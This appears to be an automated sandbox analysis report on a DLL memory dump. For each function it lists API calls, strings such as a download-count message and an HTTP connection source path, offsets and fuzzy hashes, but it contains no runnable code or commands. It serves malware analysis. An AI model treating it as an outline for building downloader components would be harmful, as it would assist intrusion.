SwitchToThread.KERNEL32(?,?,?,?,93656AD3,?,?,?,?,?,10050C98,000000FF), ref: 10025263
Sleep.KERNEL32(00000001,?,?,?,?,93656AD3,?,?,?,?,?,10050C98,000000FF), ref: 10025272

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Thread$CompareCurrentExchangeInterlockedSleepSwitch
String ID:
API String ID: 2093090637-0
Opcode ID: 04a259b299e80969bc2d1559d06b55689e7ce4389a5ecaf7031aa6dca42bf6a5
Instruction ID: f6dbf606553bdfc6012b380ff7cb12dc7a9431c74cd62dc39b8d8cbb32ce41fd
Opcode Fuzzy Hash: 04a259b299e80969bc2d1559d06b55689e7ce4389a5ecaf7031aa6dca42bf6a5
Instruction Fuzzy Hash: 64012636A40132DBDB21D7A4ECD87ADF358FB47363F914135ED87820C0C672484992A8

Function 10020260 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1002027A

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

_free.LIBCMT ref: 10020282
_malloc.LIBCMT ref: 100202D9
_malloc.LIBCMT ref: 100202E6

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _free_malloc$ErrorFreeHeapLast
String ID:
API String ID: 2483110480-0
Opcode ID: f7696e20da9f14cc8a4f9f273da0e532d3d92c2e7cd30629e5baf4350a69fc1c
Instruction ID: b96996ba9dd0fdd4b47136e9c24c81bb7b11f053f0dbecd90a5a6174a1790e6f
Opcode Fuzzy Hash: f7696e20da9f14cc8a4f9f273da0e532d3d92c2e7cd30629e5baf4350a69fc1c
Instruction Fuzzy Hash: 681109B5501200DADB11DF14ED85B86BFA9EF41315F0880A9EE089E29BE7B6E414DBA4

Function 1003849B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 100384B2

Part of subcall function 10038AD4: ___AdjustPointer.LIBCMT ref: 10038B1D

_UnwindNestedFrames.LIBCMT ref: 100384C9
___FrameUnwindToState.LIBCMT ref: 100384DB
CallCatchBlock.LIBCMT ref: 100384FF

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 9314967b18044089f415324ef535ab2f519643b3b7824ee7fb655c0c72ac471c
Instruction ID: 989c8a7310246bee1fd08c7f23ef03ea6940c226f7113538dbc51997d19096da
Opcode Fuzzy Hash: 9314967b18044089f415324ef535ab2f519643b3b7824ee7fb655c0c72ac471c
Instruction Fuzzy Hash: F3011336000209BFCF138F55CC05ECA3BBAFF58755F118054FA186A120D736EA61EBA1

Function 10022710 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

CreateIoCompletionPort.KERNEL32(?,00000000,?,00000000,7591E010,1002228A), ref: 1002271D
PostQueuedCompletionStatus.KERNEL32(00000000,000000F1,00000000,00000000), ref: 10022749
GetLastError.KERNEL32 ref: 10022762
SetLastError.KERNEL32(00000000), ref: 10022770

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CompletionErrorLast$CreatePortPostQueuedStatus
String ID:
API String ID: 350138180-0
Opcode ID: 23e7e0e93eabe9b0a1232ae1e61b86e39d6053f83dbb8d0c2970d0f328b7123e
Instruction ID: 928306486aba1ddbb9230b49e88007acfead74f3a448b90459544f3a600550cb
Opcode Fuzzy Hash: 23e7e0e93eabe9b0a1232ae1e61b86e39d6053f83dbb8d0c2970d0f328b7123e
Instruction Fuzzy Hash: D4F06272208710AFE7709FA9FC88B97F3ECFB44715F01491AF146C6190D7B5A8868B60

Function 10041775 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 100417B9

Part of subcall function 10037966: __mtinitlocknum.LIBCMT ref: 10037978
Part of subcall function 10037966: __amsg_exit.LIBCMT ref: 10037984
Part of subcall function 10037966: EnterCriticalSection.KERNEL32(00000000,?,100417BE,0000000D,1005F8C8,00000008,10041750,00000000,00000000,?,?,100092B7,?,?,?,1000A450), ref: 10037991

InterlockedIncrement.KERNEL32(?), ref: 100417C6
__lock.LIBCMT ref: 100417DA
___addlocaleref.LIBCMT ref: 100417F8

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 153627126-0
Opcode ID: 95289a44549f5fdc7fe06f836b0ce9abde03bceab8c636a44ec7f77a1ec591e8
Instruction ID: 00b42b5061005a85ff4ec3a4903eb6c6ca583381e5b1ec23b5cc802fa2244f26
Opcode Fuzzy Hash: 95289a44549f5fdc7fe06f836b0ce9abde03bceab8c636a44ec7f77a1ec591e8
Instruction Fuzzy Hash: 4E011B75540B44AEE721DF65C806B4AF7F0EF44321F208A1EE59ADB2A1CB74A644CB15

Function 10017439 Relevance: 6.0, APIs: 4, Instructions: 38timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,?,?,?,10016F76,?,?), ref: 10017445
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,10016F76,?,?), ref: 10017453
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017466
GetTickCount.KERNEL32 ref: 10017478

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Time$CountFileLocalSystemTickUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2988263349-0
Opcode ID: e7936d27054c44839712e425be5c1da52c9c64f107c8cd8e01f798dca73fca39
Instruction ID: e9295d616fd35ee15893a1400ce62d95032bf78b27ac2fe2c3c9e10ff6d825b8
Opcode Fuzzy Hash: e7936d27054c44839712e425be5c1da52c9c64f107c8cd8e01f798dca73fca39
Instruction Fuzzy Hash: 24F03177A00225ABDB00DBE9CD85ACB7BBDFB88250F404023EB05D3664D6B49545DF90

Function 10016CAA Relevance: 6.0, APIs: 4, Instructions: 36networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000000), ref: 10016CBE
WSACreateEvent.WS2_32 ref: 10016CCC
WSAEventSelect.WS2_32(?,00000000,00000001), ref: 10016CDB

Part of subcall function 10035803: __EH_prolog3_catch.LIBCMT ref: 10043F5A

GetCurrentProcessId.KERNEL32 ref: 10016CF9

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Event$CreateCurrentH_prolog3_catchProcessSelectsocket
String ID:
API String ID: 220381849-0
Opcode ID: ed7b730840a2e0f4208ad517c129e643274bdc2bf07c4fdadd40cefbe08bc09e
Instruction ID: 5b502398bd1d20cbd50d5d3b603f0b2962fad5f82b537aec17aec2be3a6243bb
Opcode Fuzzy Hash: ed7b730840a2e0f4208ad517c129e643274bdc2bf07c4fdadd40cefbe08bc09e
Instruction Fuzzy Hash: D0F0F975601B119FE3205F6A9C4EA16FBE4FF84721F108A1EF5AAC66E0DBB094818B50

Function 1001F9C0 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1001F9D7

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

_free.LIBCMT ref: 1001F9DF
CloseHandle.KERNEL32(?,?,1001ED87), ref: 1001FA25
CloseHandle.KERNEL32(?,1001ED87), ref: 1001FA37

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandle_free$ErrorFreeHeapLast
String ID:
API String ID: 1377863804-0
Opcode ID: c9a482df25fd7a3ae0442398cf946d3079553e94705a356f4e054a1ac26ce3ed
Instruction ID: 11d5de15ce19ee5233239c03fae931e6f52a6be2bf4e98a15c78eb4f4e828f98
Opcode Fuzzy Hash: c9a482df25fd7a3ae0442398cf946d3079553e94705a356f4e054a1ac26ce3ed
Instruction Fuzzy Hash: 62F0E2B0401B10CBEB24DF30D95ABD6BBE4FF10B45F40881CE5AA9A691DB79B844CB90

Function 1000F93D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

Downloaded File's count is zero,Not start up Service., xrefs: 1000FB4C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID:
String ID: Downloaded File's count is zero,Not start up Service.
API String ID: 0-1806316517
Opcode ID: df162e2ea84d543d6cbb6a7c8a3fb6a8cf3a26ea56a0ee16716e0dbbd629577d
Instruction ID: cbee9d66ead27164a73e2dca0d090da9dd38be7c8c3075d4cef95bd769ad6c28
Opcode Fuzzy Hash: df162e2ea84d543d6cbb6a7c8a3fb6a8cf3a26ea56a0ee16716e0dbbd629577d
Instruction Fuzzy Hash: 45617F70A002459BEB04DF68C591BAE37E4EF48384F1441BDEC05AF28BDB74DA44DB92

Function 10028CDE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 10028D97

Part of subcall function 10002034: __EH_prolog.LIBCMT ref: 10002039
Part of subcall function 10002034: _memmove.LIBCMT ref: 100020E7

_memmove.LIBCMT ref: 10028E1A

Strings

d, xrefs: 10028DCE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove$H_prolog
String ID: d
API String ID: 1717342397-2564639436
Opcode ID: 16cd8e6ecd1149faf014f2ec5afb424ce218564625e9db10f176e2c5d1d65bd8
Instruction ID: daeeba4d545447bc68b8f95cee631ab7956dd3407f9c3d03369e5d5c969c9287
Opcode Fuzzy Hash: 16cd8e6ecd1149faf014f2ec5afb424ce218564625e9db10f176e2c5d1d65bd8
Instruction Fuzzy Hash: 246169B5D01249DFEF11CF98D881BDEBBB5EF14300F954069E8057B282D771AA85CBA1

Function 1001BE7E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001BE83
_sprintf.LIBCMT ref: 1001BEF8

Part of subcall function 10001898: _sprintf.LIBCMT ref: 100018EE
Part of subcall function 10001898: _memmove.LIBCMT ref: 1000190C

Strings

hjh~$754jhghj%s%s%d, xrefs: 1001BEF2

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _sprintf$H_prolog_memmove
String ID: hjh~$754jhghj%s%s%d
API String ID: 543572939-138724396
Opcode ID: 28b0bf22b7caca60c40920c12a0bcf267913406867ce6cdc72413e2974f7f49e
Instruction ID: 8d56f2f0f22957003bd35aa17217555225fe44a01291db73dbb0cb64a86ffb3c
Opcode Fuzzy Hash: 28b0bf22b7caca60c40920c12a0bcf267913406867ce6cdc72413e2974f7f49e
Instruction Fuzzy Hash: FA316B36900508BFEB01DFE8C8809DEBBB9EF19310F04486AE606F7011D774AA49CB61

Function 10018235 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001823A

Part of subcall function 10018A47: __EH_prolog.LIBCMT ref: 10018A4C
Part of subcall function 10018A47: std::locale::_Init.LIBCPMT ref: 10018A91

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

std::locale::_Init.LIBCPMT ref: 100182C4

Part of subcall function 1003274C: __EH_prolog3.LIBCMT ref: 10032753
Part of subcall function 1003274C: std::_Lockit::_Lockit.LIBCPMT ref: 1003275D
Part of subcall function 1003274C: std::locale::_Setgloballocale.LIBCPMT ref: 10032779
Part of subcall function 1003274C: _Yarn.LIBCPMT ref: 1003278F

Strings

inc\http\HttpConnection.cpp, xrefs: 10018248

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: std::locale::_$H_prologInit$H_prolog3LockitLockit::_SetgloballocaleYarn_mallocstd::_
String ID: inc\http\HttpConnection.cpp
API String ID: 3634387935-15934736
Opcode ID: b8e81a0581a06a1258dea67b2edc56d44d9bd5ea9022d2f4a26446fb18cf1ade
Instruction ID: 7a1205773bd905cc226a88309ac9bc09dfb51d4ddb2d57aec835063900d9c3eb
Opcode Fuzzy Hash: b8e81a0581a06a1258dea67b2edc56d44d9bd5ea9022d2f4a26446fb18cf1ade
Instruction Fuzzy Hash: 8241C1B5600B418FC325CF59C580A96FBF4FF48314B50896ED89A8BB11E7B4BA09CF50

Function 10016D1B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10016D20
_sprintf.LIBCMT ref: 10016D94

Strings

%d.%d.%d.%d, xrefs: 10016D8E

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_sprintf
String ID: %d.%d.%d.%d
API String ID: 1907722333-3491811756
Opcode ID: 5fda938bba414d52271d6e3bbc24ecdcb9e570590cd88a7d4ceb9d3e6a259c51
Instruction ID: dbf6fb1d5ed233b00b8bcbc95a8fbf83b5f59f4ce0bd6d7e0e012a4c93d07b08
Opcode Fuzzy Hash: 5fda938bba414d52271d6e3bbc24ecdcb9e570590cd88a7d4ceb9d3e6a259c51
Instruction Fuzzy Hash: 61216076D00149AFDB41DFE8CC419EFBBB8EF0C250F00842AE561E6151DB34EA15CBA1

Function 10019351 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100193B5

Strings

string too long, xrefs: 100193F2
invalid string position, xrefs: 100193E8

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b808868603bba8101947354f1a63435db6db78b48e9b133077a0f773a8039456
Instruction ID: 33c90798f0d8516c084e0f09cf76161ef6dc691a2bb1ff66f4c7af30e0da5eef
Opcode Fuzzy Hash: b808868603bba8101947354f1a63435db6db78b48e9b133077a0f773a8039456
Instruction Fuzzy Hash: 2C1184717107049BC724CE58D894E5AB7EAEB85750B20492EE8A2CF6C1DBB1EA84C790

Function 1000975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000975F
Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10009798

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

Strings

(, xrefs: 100097BC

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_H_prologInternal_throw_exception_malloc
String ID: (
API String ID: 1756248435-3887548279
Opcode ID: 48339d87365cb671cd187dc6e04f692106807347fa193c7a8ce4dbb9a045d657
Instruction ID: e9073c934538615a898e7b8652926b827aae5a784e18c78b09f8a191744ab2c5
Opcode Fuzzy Hash: 48339d87365cb671cd187dc6e04f692106807347fa193c7a8ce4dbb9a045d657
Instruction Fuzzy Hash: 522180B6D051159FDB04DF98D981AAEBBF4EF49390F11801AF808EB249D7709A40CB91

Function 10009829 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000982E
Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10009867

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

Strings

\, xrefs: 1000988B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
